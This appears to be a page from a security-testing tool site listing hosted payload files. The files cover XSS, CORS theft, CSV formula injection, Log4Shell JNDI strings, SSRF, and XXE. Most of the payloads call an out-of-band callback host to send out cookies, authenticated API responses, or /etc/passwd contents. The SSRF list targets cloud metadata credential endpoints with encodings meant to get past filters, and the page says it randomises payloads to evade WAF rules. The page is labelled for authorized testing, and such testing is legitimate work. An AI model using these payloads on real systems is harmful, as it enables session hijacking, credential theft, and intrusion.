[ canned test payloads · permissive CORS · authorized testing only ]
no bin set — payloads show a literal <ID>; create one at webhook.y7c.me or enter it above.
each fetch is freshly randomised (unique callback subdomain + mutated markers) to dodge signature/host WAF rules — all still correlate to your bin.
url: https://p.y7c.me/x/alert.js
/*vruwab*/AlERt(document.domain)
url: https://p.y7c.me/x/collect.js
(function(){var _p9flv=document;new Image().src='//1imiaj.<ID>.oob.y7c.me/js?u='+encodeURIComponent(location.href)+'&c='+encodeURIComponent(_p9flv.cookie)})()
url: https://p.y7c.me/x/cors-poc.html
<!doctype html><html><body><script>
var TARGET='https://target.example/api/me';
var _p9flv=new XMLHttpRequest();_p9flv.withCredentials=true;_p9flv.open('GET',TARGET);_p9flv.onload=function(){new Image().src='//4p2j38.<ID>.oob.y7c.me/cors?d='+encodeURIComponent(_p9flv.responseText)};_p9flv.send()
</script></body></html>
url: https://p.y7c.me/x/inject.csv
name,value
"=1+1","@SUM(1+9)*cmd|' /C calc'!A0"
"=HYPERLINK(""http://2xygbz.<ID>.oob.y7c.me/csv"",""click"")","=IMPORTXML(""http://n40qgp.<ID>.oob.y7c.me/csvx"",""//a"")"
url: https://p.y7c.me/x/log4shell.txt
${jndi:ldap://rzowop.<ID>.oob.y7c.me/a}
${jndi:dns://rzowop.<ID>.oob.y7c.me/a}
${jndi:rmi://rzowop.<ID>.oob.y7c.me/a}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://rzowop.<ID>.oob.y7c.me/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://rzowop.<ID>.oob.y7c.me/a}
${jndi:ldap://${hostName}.rzowop.<ID>.oob.y7c.me/a}
url: https://p.y7c.me/x/onerror.svg
<svg xmlns="http://www.w3.org/2000/svg" oNLoad="new Image().src='//rb3h0g.<ID>.oob.y7c.me/svg'"><sCRiPt>new Image().src='//z2ky5n.<ID>.oob.y7c.me/svg2'</scripT></svg>
url: https://p.y7c.me/x/poly.html
<!doctype html><html><body><img src="//djj2va.<ID>.oob.y7c.me/img"><script>var _p9flv=document;new Image().src='//dhb1hc.<ID>.oob.y7c.me/js?c='+encodeURIComponent(_p9flv.cookie)</script></body></html>
url: https://p.y7c.me/x/redirect.html
<!doctype html><meta http-equiv="refresh" content="0;url=//sq5dnf.<ID>.oob.y7c.me/landed">
url: https://p.y7c.me/x/ssrf.txt
# callbacks to your bin (confirm SSRF via DNS/HTTP): http://qm17iy.<ID>.oob.y7c.me/ssrf //qm17iy.<ID>.oob.y7c.me/ssrf http://qm17iy.<ID>.oob.y7c.me@127.0.0.1/ http://127.0.0.1#qm17iy.<ID>.oob.y7c.me/ gopher://qm17iy.<ID>.oob.y7c.me:80/_GET%20/%20HTTP/1.0 # cloud metadata (try through the SSRF): http://169.254.169.254/latest/meta-data/iam/security-credentials/ http://[::ffff:169.254.169.254]/latest/meta-data/ http://metadata.google.internal/computeMetadata/v1/ (header: Metadata-Flavor: Google) # 169.254.169.254 encodings to dodge filters: http://2852039166/latest/meta-data/ http://0xA9FEA9FE/latest/meta-data/ http://0251.0376.0251.0376/latest/meta-data/
url: https://p.y7c.me/x/xss.html
<!doctype html><html><body> <Img src=xonErROR="new Image().src='//u7y79m.<ID>.oob.y7c.me/img?c='+encodeURIComponent(document.cookie)"> <svg ONLOAD="new Image().src='//9eu37y.<ID>.oob.y7c.me/svg'"> <IfRAmE srcdoc="<imG/SrC=x oneRror="new Image().src='//rrs1mf.<ID>.oob.y7c.me/iframe?c='+encodeURIComponent(document.cookie)">"> <BoDYonlOAD="new Image().src='//12rlhp.<ID>.oob.y7c.me/body'"> </body></html>
url: https://p.y7c.me/x/xxe-php.dtd
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://55xe9k.<ID>.oob.y7c.me/xxe?d=%file;'>"> %eval; %exfil;
url: https://p.y7c.me/x/xxe.dtd
<!ENTITY % file SYSTEM "file:///etc/hostname"> <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://1zeyqq.<ID>.oob.y7c.me/xxe?d=%file;'>"> %eval; %exfil;
← tools.y7c.me · authorized security testing only · © 2026 Digital Gangster Enterprises, LLC